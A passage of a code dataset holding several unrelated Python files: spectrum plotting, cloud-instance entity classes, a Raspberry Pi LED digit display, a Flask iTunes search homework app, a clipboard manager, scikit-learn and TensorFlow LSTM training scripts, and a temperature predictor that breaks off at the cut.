self.axes[1].set_ylabel(self.ylabel)\n self.axes[1].ticklabel_format(style='sci', scilimits=(-2, 3))\n self.fig.tight_layout()\n self.cid = self.axes[1].figure.canvas.mpl_connect('button_press_event', self._onclick)\n\n self.fig.canvas.draw_idle()\n\n def set_bin(self,bin):\n\n old_bin_x = self.bin_x\n old_bin_y = self.bin_y\n if isinstance(bin, list):\n\n self.bin_x = int(bin[0])\n self.bin_y = int(bin[1])\n\n else:\n self.bin_x = int(bin)\n self.bin_y = int(bin)\n\n self.rect.set_width(self.rect.get_width()*self.bin_x/old_bin_x)\n self.rect.set_height((self.rect.get_height()*self.bin_y/old_bin_y))\n if self.x+self.bin_x > self.cube.shape[0]:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y+self.bin_y > self.cube.shape[1]:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.rect.set_xy([self.x*self.rect.get_width()/self.bin_x + self.rectangle[0],\n self.y*self.rect.get_height()/self.bin_y + self.rectangle[2]])\n self._update()\n\n def get_spectrum(self):\n if self.x > self.cube.shape[0]-self.bin_x:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y > self.cube.shape[1]-self.bin_y:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.spectrum = np.average(self.cube[self.x:self.x+self.bin_x,self.y:self.y+self.bin_y,:], axis=(0,1))\n #* self.intensity_scale[self.x,self.y]\n return self.spectrum\n\n def _onclick(self,event):\n self.event = event\n if event.inaxes in [self.axes[0]]:\n x = int(event.xdata)\n y = int(event.ydata)\n\n x= int(x - self.rectangle[0])\n y= int(y - self.rectangle[2])\n\n if x>=0 and y>=0:\n if x<=self.rectangle[1] and y<= self.rectangle[3]:\n self.x = int(x/(self.rect.get_width()/self.bin_x))\n self.y = int(y/(self.rect.get_height()/self.bin_y))\n\n if self.x+self.bin_x > self.cube.shape[0]:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y+self.bin_y > self.cube.shape[1]:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.rect.set_xy([self.x*self.rect.get_width()/self.bin_x + self.rectangle[0],\n self.y*self.rect.get_height()/self.bin_y + self.rectangle[2]])\n #self.ax1.set_title(f'{self.x}')\n 
self._update()\n\n def _update(self, ev=None):\n\n xlim = self.axes[1].get_xlim()\n ylim = self.axes[1].get_ylim()\n self.axes[1].clear()\n self.get_spectrum()\n\n\n self.axes[1].plot(self.energy_scale,self.spectrum, label = 'experiment')\n\n self.axes[1].set_title(' spectrum {},{} '.format(self.x, self.y))\n\n\n self.axes[1].set_xlim(xlim)\n self.axes[1].set_ylim(ylim)\n self.axes[1].set_xlabel(self.xlabel)\n self.axes[1].set_ylabel(self.ylabel)\n\n self.fig.canvas.draw_idle()\n\n\n def set_legend(self, setLegend):\n self.plot_legend = setLegend\n\n def get_xy(self):\n return [self.x,self.y]\n","sub_path":"pyNSID/viz/plot_nsid.py","file_name":"plot_nsid.py","file_ext":"py","file_size_in_byte":17450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"103673547","text":"\"\"\"iCE entities.\"\"\"\n\n\n#\n# Base entity class\n#\n\nclass Entity(object):\n \"\"\"Generic entity.\n\n :type id: str\n :type created: datetime.datetime\n :type update: datetime.datetime\n :type etag: str\n \"\"\"\n\n def __init__(self, **kwargs):\n # MongoDB stuff\n self.id = kwargs.get('_id', None)\n self.created = kwargs.get('_created', None)\n self.updated = kwargs.get('_updated', None)\n # ETag\n self.etag = kwargs.get('_etag', None)\n\n def to_dict(self):\n \"\"\"Converts the entity to dictionary.\n\n :rtype: dict\n :return: A Python dictionary with the attributes of the entity.\n \"\"\"\n _dict = {}\n for key, value in self.__dict__.items():\n if value is None:\n continue\n if key.startswith('_'):\n continue\n if key in ['id', 'created', 'updated', 'etag']: # TODO\n continue\n _dict[key] = value\n return _dict\n\n\n#\n# Session class\n#\n\nclass Session(Entity):\n \"\"\"Represents an experimentation session.\n\n :type client_ip_addr: str\n \"\"\"\n\n def __init__(self, **kwargs):\n super(Session, self).__init__(**kwargs)\n\n # Attributes\n self.client_ip_addr = kwargs['client_ip_addr']\n\n\n#\n# Instance class\n#\n\nclass Instance(Entity):\n \"\"\"Represents a cloud instance.\n\n :type session_id: str\n :type networks: list\n :type public_ip_addr: str\n :type public_reverse_dns: str\n :type ssh_username: str\n :type ssh_port: int\n :type ssh_authorized_fingerprint: str\n :type tags: dict\n \"\"\"\n\n #\n # Constructor\n #\n\n def __init__(self, **kwargs):\n super(Instance, self).__init__(**kwargs)\n\n # Session\n self.session_id = kwargs['session_id']\n\n # Networking\n self.networks = []\n for net in kwargs.get('networks', []):\n my_net = {\n 'addr': net['addr']\n }\n if 'iface' in net:\n my_net['iface'] = net['iface']\n if 'bcast_addr' in net:\n my_net['bcast_addr'] = net['bcast_addr']\n self.networks.append(my_net)\n\n # Public network\n self.public_ip_addr = kwargs['public_ip_addr']\n self.public_reverse_dns = kwargs.get('public_reverse_dns', '')\n\n # SSH options\n self.ssh_port = int(kwargs.get('ssh_port', 22))\n self.ssh_username = kwargs.get('ssh_username', '')\n self.ssh_authorized_fingerprint = kwargs.get(\n 'ssh_authorized_fingerprint', ''\n )\n\n # Tags\n self.tags = kwargs.get('tags', {})\n\n #\n # Setters\n #\n\n def add_network(self, addr, iface=None, bcast_addr=None):\n \"\"\"Adds network in the instance.\n\n :param str addr: The address and mask of the network (e.g.:\n 192.168.1.112/24).\n :param str iface: The interface of the network (e.g.: eth0).\n :param str bcast_addr: The broadcast address of the network.\n \"\"\"\n my_net = {\n 'addr': addr\n }\n if iface is not None:\n my_net['iface'] = iface\n if bcast_addr is not None:\n 
my_net['bcast_addr'] = bcast_addr\n self.networks.append(my_net)\n","sub_path":"ice/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"509227863","text":"# Advent of Code 2019: https://adventofcode.com/2019/day/11\n# \n# \n\nfrom AoC17_classes import Scaffoliding\n\ninfile = open('data/input_17.txt','r')\ninputData1 = infile.readline().strip().split(',')\n\n# Part 1\ne = Scaffoliding(inputData1)\ne.WriteScaff()\n# e.PlotPanels()\n\n# print(\"Part 1: \", e.NumberOfBlocks())\n\n# Part 2\n# result = w.RunAgain()\n# print(\"Part 2: \", result)\n","sub_path":"2019/Day18/code/AoC18.py","file_name":"AoC18.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"146799394","text":"#!/usr/bin/env python3\nimport time\nfrom rpi_ws281x import *\nimport argparse\n\n# LED strip0 configuration:\nLED0_COUNT = 14 # Number of leds\nLED0_PIN = 12 # GPIO pin connected to the pixels (18 uses PWM!) PIN 32\nLED0_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED0_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED0_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED0_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED0_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# LED CABLING MAP\n# /08-07\\\n# 09 06\n# 10 05\n# >11 04<\n# 12 03\n# 13 02\n# ----00-01/\n\n# LED strip1 configuration:\nLED1_COUNT = 14 # Number of leds\nLED1_PIN = 13 # GPIO pin connected to the pixels PIN 33\nLED1_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED1_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED1_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED1_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED1_CHANNEL = 1 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n\n\nNUMBERMAP = [\n # [0,1,2,3,5,6,7,8,9,10,12,13], # real 0\n [], # 0 off\n [2,3,5,6], # 1\n [0,1,4,5,6,7,8,11,12,13], # 2\n [0,1,2,3,4,5,6,7,8,11], # 3\n [2,3,4,5,6,9,10,11], # 4\n [0,1,2,3,4,7,8,9,10,11], # 5\n [0,1,2,3,4,7,8,9,10,11,12,13], # 6\n [2,3,5,6,7,8], # 7\n [0,1,2,3,4,5,6,7,8,9,10,11,12,13],# 8\n [0,1,2,3,4,5,6,7,8,9,10,11] # 9\n\n]\n\n# Define functions which animate LEDs in various ways.\ndef colorWipe(strip, color, number):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(0, number):\n #print(\"Light on: {}\".format(i))\n strip.setPixelColor(i, color)\n for i in range(number, LED0_COUNT):\n #print(\"Light off: {}\".format(i))\n strip.setPixelColor(i, Color(0,0,0))\n strip.show()\n\ndef showNumber(strip, color, number):\n for i in NUMBERMAP[number]:\n #print(\"Light on: {}\".format(i))\n strip.setPixelColor(i, color)\n for i in list(set(NUMBERMAP[8]) - set(NUMBERMAP[number])):\n #print(\"Light off: {}\".format(i))\n strip.setPixelColor(i, Color(0,0,0))\n strip.show()\n\n# Main program logic follows:\nif __name__ == '__main__':\n # Process arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--num', type=int, help='number to show', required=True)\n parser.add_argument('-s', '--style', choices=['dot', 'number'], default = 'number')\n parser.add_argument('-r', '--red', type=int, default=255)\n parser.add_argument('-g', '--green', type=int, default=255)\n parser.add_argument('-b', '--blue', type=int, 
default=255)\n    args = parser.parse_args()\n\n    # Create NeoPixel objects with appropriate configuration.\n    strip0 = Adafruit_NeoPixel(LED0_COUNT, LED0_PIN, LED0_FREQ_HZ, LED0_DMA, LED0_INVERT, LED0_BRIGHTNESS, LED0_CHANNEL, WS2812_STRIP)\n    strip1 = Adafruit_NeoPixel(LED1_COUNT, LED1_PIN, LED1_FREQ_HZ, LED1_DMA, LED1_INVERT, LED1_BRIGHTNESS, LED1_CHANNEL, WS2812_STRIP)\n    # Initialize the library (must be called once before other functions).\n    strip0.begin()\n    strip1.begin()\n    color = Color(args.green, args.red, args.blue)\n    showNumber(strip1, color, args.num)\n    if args.num <= 3:\n        colorWipe(strip0, color, args.num)\n\n","sub_path":"shownumber.py","file_name":"shownumber.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"445088139","text":"import numpy as np\r\nimport pylab as plt\r\n\r\n#c)\r\nV_hat = np.linspace(0.4,20,100)\r\nT_hat = np.array([1.15,1.0,0.85])\r\np_hat = np.zeros((3,100))\r\n\r\nj = 0\r\ni = 0\r\n\r\nfor T in T_hat:\r\n\tfor V in V_hat:\r\n\t\tp_hat[j,i] = 8*T/(3*V - 1) - 3./V**2\r\n\t\ti += 1\r\n\ti = 0\r\n\tj += 1\r\n\r\nplt.plot(p_hat[0,:],V_hat,'-r',label=\"T/Tc = 1.15\")\r\nplt.plot(p_hat[1,:],V_hat,'-b',label=\"T/Tc = 1.0\")\r\nplt.plot(p_hat[2,:],V_hat,'-g',label=\"T/Tc = 0.85\")\r\nplt.xlabel('Volume, V/Vc')\r\nplt.ylabel('Pressure, p/pc')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\n#e)\r\n\r\nrho_hat = np.linspace(0.0,2.0,100)\r\n\r\nj = 0\r\ni = 0\r\n\r\nfor T in T_hat:\r\n\tfor rho in rho_hat:\r\n\t\tp_hat[j,i] = 8*rho*T/(3-rho) - 3*rho**2\r\n\t\ti += 1\r\n\ti = 0\r\n\tj += 1\r\n\r\nplt.plot(p_hat[0,:],rho_hat,'-r',label=\"T/Tc = 1.15\")\r\nplt.plot(p_hat[1,:],rho_hat,'-b',label=\"T/Tc = 1.0\")\r\nplt.plot(p_hat[2,:],rho_hat,'-g',label=\"T/Tc = 0.85\")\r\nplt.xlabel('Density, Rho/Rho_c')\r\nplt.ylabel('Pressure, p/p_c')\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"Oblig3-c.py","file_name":"Oblig3-c.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"402000411","text":"#** Nunez, Priscilla\n#** Fall 2018\n#** HW2 completed \n\n#** HW2 is complete. Please reference the template folder. These are my own solutions - NunezP\n\n#############################\n##### IMPORT STATEMENTS #####\n#############################\nimport requests\nimport json\n\nfrom flask import Flask, request, render_template, url_for\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, RadioField, ValidationError\nfrom wtforms.validators import Required\n\n#####################\n##### APP SETUP #####\n#####################\n\napp = Flask(__name__) \napp.config['SECRET_KEY'] = 'hardtoguessstring' #** Environment Variable and hardcoded string \n\n####################\n###### FORMS #######\n####################\n\nclass AlbumEntryForm(FlaskForm): #** Form - string, validation and labels\n    album_name = StringField('Enter the name of an album:', validators=[Required()])\n    options = RadioField('How much do you like this album? (1 low, 3 high)', validators=[Required()], choices=[('1','1'), ('2','2'), ('3','3')], default='3')\n    submit = SubmitField('Submit')\n\n\n####################\n###### ROUTES ######\n####################\n\n@app.route('/')\ndef hello_world():\n    return 'Hello World!'\n\n\n@app.route('/user/<name>')\ndef hello_user(name):\n    return 'Hello {0}'.format(name) #** 0 is for (name)\n\n@app.route('/artistform') #** Has artistform.html page\ndef artistform():\n    return render_template('artistform.html')\n\n@app.route('/artistinfo')\ndef artistinfo():\n    artist = request.args.get('artist') #** Normal form is used \n    if artist:\n        url = \"https://itunes.apple.com/search\"\n        params = {\"media\": \"music\", \"term\": artist}\n        get_name = requests.get(url, params = params)\n        json_format = json.loads(get_name.text)\n    \n    return render_template('artist_info.html', objects=json_format[\"results\"])\n\n@app.route('/artistlinks')\ndef artistlinks():\n    return render_template('artist_links.html')\n\n@app.route('/specific/song/<artist_name>')\ndef specific_song(artist_name):\n    if artist_name:\n        url = \"https://itunes.apple.com/search\"\n        params = {\"media\": \"music\", \"term\": artist_name}\n        get_name = requests.get(url, params = params)\n        json_format = json.loads(get_name.text)\n\n    context = {\n        'results': json_format[\"results\"],\n    }\n    return render_template('specific_artist.html', **context) #** **context - will group all context together and pass them to template. All the data (variables passed) used to render itself in templates. Example: 'form','data', 'results'\n\n@app.route('/album_entry')\ndef album_entry():\n    form = AlbumEntryForm() #** Create Instance of form\n    return render_template('album_entry.html', form=form) #** Pass down\n\n@app.route('/album_result')\ndef album_result():\n    args = request.args\n    album_name = args.get('album_name')\n    star = args.get('options')\n    \n    data = {\n        \"star\": star,\n        \"album_name\": album_name #** Added paragraph inbetween {{form.album_name.label}} and added label options along with submit button\n    }\n    \n    return render_template('album_data.html', data=data)\n\n\nif __name__ == '__main__':\n    app.run(use_reloader=True,debug=True)","sub_path":"SI364W18_HW2.py","file_name":"SI364W18_HW2.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"17584705","text":"#! 
python3\n# mcb.pyw - Saves and loads pieces of text to the clipboard.\n# Usage:\tpython3 mcb.pyw save <keyword> - Saves clipboard to keyword\n#\t\t\tpython3 mcb.pyw delete <keyword> - deletes the keyword\n#\t\t\tpython3 mcb.pyw <keyword> - Loads the keyword to clipboard\n#\t\t\tpython3 mcb.pyw list - Loads all keywords to the clipboard\n#\t\t\tpython3 mcb.pyw delete - deletes all keywords\n\nimport shelve, pyperclip, sys\n\nmcbShelf = shelve.open('mcb')\n\n# Save and delete clipboard content.\nif len(sys.argv) == 3:\n\tif sys.argv[1].lower() == 'save':\n\t\tmcbShelf[sys.argv[2]] = pyperclip.paste()\n\telif sys.argv[1].lower() == 'delete':\n\t\tdel mcbShelf[sys.argv[2]]\n\t\nelif len(sys.argv) == 2:\n# List all keywords, delete all keywords and load content.\n\tif sys.argv[1].lower() == 'list':\n\t\tpyperclip.copy(str(list(mcbShelf.keys())))\n\telif sys.argv[1].lower() == 'delete':\n\t\tfor item in list(mcbShelf.keys()):\n\t\t\tdel mcbShelf[item]\n\telif sys.argv[1] in mcbShelf:\n\t\tpyperclip.copy(mcbShelf[sys.argv[1]])\n\nmcbShelf.close()\n","sub_path":"ATBSWP/Chap8/mcb.pyw","file_name":"mcb.pyw","file_ext":"pyw","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"11798070","text":"import preprocess\nimport config\n\nimport os\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier, RandomForestClassifier\nfrom mlxtend.classifier import StackingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score, roc_auc_score\n\ndef train_model(X_train, y_train, X_test, y_test, model_name, model, param_range):\n    \"\"\"\n\n    Train the model with the given parameters and return:\n    1. the best model\n    2. the average training time\n    3. 
the accuracy\n    \"\"\"\n    print('Training {}...'.format(model_name))\n    clf = GridSearchCV(estimator=model,\n                       param_grid=param_range,\n                       cv=5,\n                       scoring='accuracy',\n                       refit=True)  # refit=True: after 5-fold cross-validation, retrain once on the full training set\n    start = time.time()\n    clf.fit(X_train, y_train)\n    # timing\n    end = time.time()\n    duration = end - start\n    print('Took {:.4f}s'.format(duration))\n\n    # Validate the model\n    print('Training accuracy: {:.3f}'.format(clf.score(X_train, y_train)))\n\n    score = clf.score(X_test, y_test)\n    print('Test accuracy: {:.3f}'.format(score))\n    print('Model training time: {:.4f}s'.format(duration))\n    print()\n\n    return clf, score, duration\n\ndef main():\n    \"\"\"\n    Main function\n    \"\"\"\n    # Prepare the dataset\n    train_data, test_data = preprocess.prepare_data()\n\n    # Inspect the dataset\n    preprocess.inspect_dataset(train_data, test_data)\n\n    # Feature engineering\n    # Build the training and test data\n    X_train, X_test = preprocess.do_feature_engineering(train_data, test_data)\n\n    print('There are {} feature dimensions in total.'.format(X_train.shape[1]))\n\n    # Process the labels\n    y_train = train_data['label'].values\n    y_test = test_data['label'].values\n\n    # Data modeling and validation\n    print('\\n===================== Data modeling and validation =====================')\n    sclf = StackingClassifier(classifiers=[KNeighborsClassifier(),\n                                           SVC(kernel='linear'),\n                                           DecisionTreeClassifier()],\n                              meta_classifier=LogisticRegression())\n    # Specify the parameters for each classifier\n    model_name_param_dict = {'kNN': (KNeighborsClassifier(),\n                                     {'n_neighbors': [5, 15, 25]}),\n                             'LR': (LogisticRegression(),\n                                    {'C': [0.01, 1, 100]}),\n                             'SVM': (SVC(kernel='linear'),\n                                     {'C': [0.01, 1, 100]}),\n                             'DT': (DecisionTreeClassifier(),\n                                    {'max_depth': [50, 100, 150]}),\n                             'Stacking': (sclf,\n                                          {'kneighborsclassifier__n_neighbors': [5, 15, 25],\n                                           'svc__C': [0.01, 1, 100],\n                                           'decisiontreeclassifier__max_depth': [50, 100, 150],\n                                           'meta-logisticregression__C': [0.01, 1, 100]}),\n                             'AdaBoost': (AdaBoostClassifier(),\n                                          {'n_estimators': [50, 100, 150, 200]}),\n                             'GBDT': (GradientBoostingClassifier(),\n                                      {'learning_rate': [0.01, 0.1, 1, 10, 100]}),\n                             'RF': (RandomForestClassifier(),\n                                    {'n_estimators': [100, 150, 200, 250]}),\n                             'NB': (GaussianNB(), {'priors': [None]})}\n    # model_name_param_dict = {'NB': (GaussianNB(), {'priors': [None]})}\n    # DataFrame for comparing the results\n    results_df = pd.DataFrame(columns=['Accuracy (%)', 'Time (s)'],\n                              index=list(model_name_param_dict.keys()))\n    results_df.index.name = 'Model'\n\n    for model_name, (model, param_range) in model_name_param_dict.items():\n        best_clf, best_acc, mean_duration = train_model(X_train, y_train, X_test, y_test,\n                                                        model_name, model, param_range)\n        results_df.loc[model_name, 'Accuracy (%)'] = best_acc * 100\n        results_df.loc[model_name, 'Time (s)'] = mean_duration\n    results_df.to_csv(os.path.join(config.output_path, 'model_comparison.csv'))\n\n    # Compare models and results\n    print('\\n===================== Comparing models and results =====================')\n\n    plt.figure(figsize=(10, 4))\n    ax1 = plt.subplot(1, 2, 1)\n    results_df.plot(y=['Accuracy (%)'], kind='bar', ylim=[40, 100], ax=ax1, title='Accuracy(%)', legend=False)\n\n    ax2 = plt.subplot(1, 2, 2)\n    results_df.plot(y=['Time (s)'], kind='bar', ax=ax2, title='Time (s)', legend=False)\n    plt.tight_layout()\n    plt.savefig(os.path.join(config.output_path, './pred_results.png'))\n    plt.show()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"device_classify1.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"154722672","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 19 23:00:23 2017\r\n\r\n@author: Chris\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import time\r\nimport 
pickle\n\n# Parameters\nLEARN_RATE = 0.001 # 0.001\nBATCHSIZE = 100 # 100\nTRAINSIZE = 55000\nEPOCHS = 5\nNUMITER = EPOCHS*TRAINSIZE//BATCHSIZE\nSEQ_LENGTH = 784\nHIDDEN_UNITS = 32\nOUT_CELLS = 100\nNCLASSES = 10\nSNAP_INTERVAL = 10\nNUMSNAPS = NUMITER//SNAP_INTERVAL\nCHKPOINT = \"/LSTM32_params_new.ckpt\"\n#CHKPOINT = \"C:/Users/Chris/SkyDrive/MSc/Advanced_Topics/Assignment2/LSTM32_params.ckpt\"\nPKLFILE = \"LSTM32_data.pckl\"\n#PKLFILE = \"C:/Users/Chris/SkyDrive/MSc/Advanced_Topics/Assignment2/LSTM32_data.pckl\"\n\n# Vectors for saving training and test accuracy and cross-entropy\ntrain_accuracy = np.zeros(NUMSNAPS)\ntest_accuracy = np.zeros(NUMSNAPS)\ntrain_crossent = np.zeros(NUMSNAPS)\ntest_crossent = np.zeros(NUMSNAPS)\n\ndef binarize(images, threshold=0.1):\n return (threshold < images).astype('float32')\n\n# Import MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n#train_images = np.expand_dims(binarize(mnist.train.images), axis=2)\ntest_images = np.expand_dims(binarize(mnist.test.images), axis=2)\ntestsize = test_images.shape[0]\ntestbatches = testsize//BATCHSIZE\n\n# Clear graph and set up placeholders for data\ntf.reset_default_graph()\n#x = tf.placeholder(tf.float32, [None, 784, 1])\n#ytrue = tf.placeholder(tf.float32, [None, 10])\n\nx = tf.placeholder(tf.float32, [BATCHSIZE, SEQ_LENGTH, 1])\nytrue = tf.placeholder(tf.float32, [BATCHSIZE, NCLASSES])\n\n# Define RNN model\ncell = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_UNITS, state_is_tuple=True)\nval, state = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)\nval = tf.transpose(val, [1, 0, 2])\nlast = tf.gather(val, int(val.get_shape()[0]) - 1)\n\n# Set up variables\n#W = tf.Variable(tf.truncated_normal([num_hidden, int(ytrue.get_shape()[1])]))\n#bias = tf.Variable(tf.constant(0.1, shape=[target.get_shape()[1]]))\nW1 = tf.Variable(tf.truncated_normal([HIDDEN_UNITS, OUT_CELLS],stddev=0.1), name='W1')\nb1 = tf.Variable(tf.constant(0.1, shape=[OUT_CELLS]), name='b1')\nW2 = tf.Variable(tf.truncated_normal([OUT_CELLS, NCLASSES],stddev=0.1), name='W2')\nb2 = tf.Variable(tf.constant(0.1, shape=[NCLASSES]), name='b2')\n\nout1 = tf.nn.relu(tf.matmul(last, W1) + b1)\ny = tf.matmul(out1, W2) + b2\n\n# Define loss function\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, ytrue))\n\n# Define how to train the model\ntrain_step = tf.train.AdamOptimizer(LEARN_RATE).minimize(cross_entropy)\n\n# Calculate Accuracy\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(ytrue,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Add ops to save all the variables.\n#saver = tf.train.Saver(write_version = tf.train.SaverDef.V1)\nsaver = tf.train.Saver()\n\n# Initialise the variables\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n best_accuracy = 0\n\n # Run NUMITER minibatch updates\n for i in range(NUMITER):\n batch_xs, batch_ys = mnist.train.next_batch(BATCHSIZE)\n batch_xsb = binarize(np.expand_dims(batch_xs, axis=2))\n sess.run(train_step, feed_dict={x: batch_xsb, ytrue: batch_ys})\n if i % SNAP_INTERVAL == 0:\n snap = i//SNAP_INTERVAL \n train_accuracy[snap], train_crossent[snap] = sess.run([accuracy, cross_entropy],\n feed_dict={x: batch_xsb, ytrue: batch_ys})\n# starttime = time.time()\n for j in range(testbatches):\n test_acc_new, test_cross_new = sess.run([accuracy, cross_entropy],\n feed_dict={x: test_images[j*BATCHSIZE:(j+1)*BATCHSIZE],\n ytrue: 
mnist.test.labels[j*BATCHSIZE:(j+1)*BATCHSIZE]})\n test_accuracy[snap] += test_acc_new\n test_crossent[snap] += test_cross_new\n test_accuracy[snap] = test_accuracy[snap]/testbatches\n test_crossent[snap] = test_crossent[snap]/testbatches\n print('Train accuracy:', \"{:.1%}\".format(train_accuracy[snap]),\n ' Test accuracy:', \"{:.1%}\".format(test_accuracy[snap])) \n if test_accuracy[snap]>best_accuracy:\n best_accuracy = test_accuracy[snap]\n save_path = saver.save(sess, CHKPOINT)\n print(\"Model saved in file: %s\" % save_path) \n \n# endtime = time.time()\n# print('Time to calc test error:', \"{:.1f}\".format(endtime-starttime))\n\n # Calculate final test accuracy\n test_acc = 0\n test_cross = 0\n for j in range(testbatches):\n test_acc_new, test_cross_new = sess.run([accuracy, cross_entropy],\n feed_dict={x: test_images[j*BATCHSIZE:(j+1)*BATCHSIZE],\n ytrue: mnist.test.labels[j*BATCHSIZE:(j+1)*BATCHSIZE]})\n test_acc += test_acc_new\n test_cross += test_cross_new\n test_acc = test_acc/testbatches\n test_cross = test_cross/testbatches\n\n print('Final Test accuracy:', \"{:.1%}\".format(test_acc))\n \n # Save the variables to disk.\n# save_path = saver.save(sess, CHKPOINT)\n# print(\"Model saved in file: %s\" % save_path) \n\n# final_state = sess.run(state, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# final_val = sess.run(val, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# final_last = sess.run(last, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# W1_tr, b1_tr, W2_tr, b2_tr = sess.run([W1,b1,W2,b2], feed_dict={x: batch_xsb, ytrue: batch_ys})\n\n # Calculate confusion matrix\n# y_pred, y_actu = sess.run([tf.argmax(y,1), tf.argmax(ytrue,1)],\n# feed_dict={x: mnist.test.images, ytrue: mnist.test.labels})\n# cm = confusion_matrix(y_actu, y_pred)\n\n # Plot the training and test errors during training\n trainline = plt.plot(np.arange(0,NUMITER,SNAP_INTERVAL), train_accuracy.T, linewidth=2)\n testline = plt.plot(np.arange(0,NUMITER,SNAP_INTERVAL), test_accuracy.T, linewidth=2)\n plt.legend(['Train Accuracy','Test Accuracy'])\n plt.title(\"Training RNN with 32-unit LSTM\")\n plt.show()\n\n# Save training hisotry to disk.\npickle.dump([train_accuracy, test_accuracy, train_crossent, test_crossent], open(PKLFILE, \"wb\"))\n","sub_path":"LSTM32_Training_AMI.py","file_name":"LSTM32_Training_AMI.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"21647157","text":"import pandas as pd\nfrom joblib import load\nimport datetime\n\ntry:\n # load_input_data\n data_mean = pd.read_csv('data/data_mean.csv')\n data_median = pd.read_csv('data/data_median.csv')\n\n # load the model\n clf = load('data/trained_model.joblib')\n\nexcept FileNotFoundError:\n import data_preprocessing\n\n # load_input_data\n data_mean = pd.read_csv('data/data_mean.csv')\n data_median = pd.read_csv('data/data_median.csv')\n\n # load the model\n clf = load('data/trained_model.joblib')\n\n\n# Define months with a dictionary\n\n\n# Making a function for prediction. 
Here we also use Python's 'datetime.datetime.strptime()' and\n# 'datetime.datetime.strftime()' to get a Month name and corresponding date.\ndef make_prediction(model, month, day):\n mean_input = pd.DataFrame(data_mean.query(f'month=={month}').query(f'day=={day}').mean())\n # mean_temp_min = round(float(mean_input.T[\"temp_min\"]), 2)\n # mean_temp_max = round(float(mean_input.T[\"temp_max\"]), 2)\n\n median_input = pd.DataFrame(data_median.query(f'month=={month}').query(f'day=={day}').median())\n # median_temp_min = round(float(median_input.T[\"temp_min\"]), 2)\n # median_temp_max = round(float(median_input.T[\"temp_max\"]), 2)\n\n prediction_day = datetime.datetime.strptime(str(month) + '/' + str(day), \"%m/%d\")\n\n try:\n mean_p = float(model.predict(mean_input.T))\n median_p = float(model.predict(median_input.T))\n print(\"*\"*35)\n print(f\" Predictions for {prediction_day.strftime('%B %d')}\")\n print(\"*\"*35)\n print(f\"Mean predicted temperature: {str(round(mean_p, 2))}°C\")\n print(\"~\"*40)\n print(f\"Median predicted temperature: {str(round(median_p, 2))}°C\")\n print(\"~\"*40)\n\n\n except ValueError:\n print(\"The combination of month and date is incorrect! Please type a correct month-day combination\")\n ask(clf)\n\n\ndef ask(model):\n while True:\n try:\n month = int(input(\"Please select a month (format: mm)\\n\"))\n\n if month not in range(1, 13):\n print(\"Incorrect input! Please enter a month number in 'mm' format between(1-12)\")\n continue\n if month in range(1, 13):\n 